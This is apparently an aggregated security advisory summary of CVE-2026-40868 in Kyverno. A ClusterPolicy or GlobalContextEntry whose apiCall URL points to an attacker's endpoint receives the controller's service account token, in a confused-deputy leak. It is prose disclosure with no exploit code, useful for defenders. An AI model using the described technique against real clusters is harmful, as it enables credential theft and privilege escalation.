## Kyverno Security Flaw: CVE-2026-40868 Allows Service Account Token Leak to Attacker-Controlled Endpoints
A critical vulnerability in Kyverno's policy engine can inadvertently leak the powerful controller service account token to external, potentially malicious servers. The flaw, tracked as CVE-2026-40868, resides in the `apiCall` servicecall helper, which automatically injects an `Authorization: Bearer` header using Kyverno's own service account token when a policy does not explicitly set one. Crucially, because the target URL (`context.apiCall.service.url`) is defined within the policy itself, an attacker who can control a policy can direct this authenticated request to their own endpoint, capturing the token in a classic confused deputy attack.

The primary attack vector involves an adversary creating or updating a ClusterPolicy, or creating a GlobalContextEntry, that specifies a malicious URL. While namespaced policies are blocked from using this feature by a `urlPath` gate, ClusterPolicies and global contexts are fully exposed. This creates a significant risk in real-world GitOps deployments: if the repository or controller managing these policies is compromised, the policy definitions become untrusted input, turning Kyverno's automation into a tool for credential exfiltration.

The implications are severe for any cluster relying on Kyverno for policy enforcement. The leaked service account token, which carries the permissions of the Kyverno controller, could grant an attacker broad access to cluster resources, enabling further escalation. This vulnerability underscores the inherent danger in systems where security-critical automation can be directed by externally controllable configuration, placing immense trust in the integrity of the policy supply chain.
---
- **Source**: GitHub Issues
- **Sector**: The Lab
- **Tags**: CVE-2026-40868, Kubernetes, Security Vulnerability, Supply Chain Attack, GitOps
- **Credibility**: unverified
- **Published**: 2026-04-17 09:22:43
- **ID**: 69133
- **URL**: https://whisperx.ai/en/intel/69133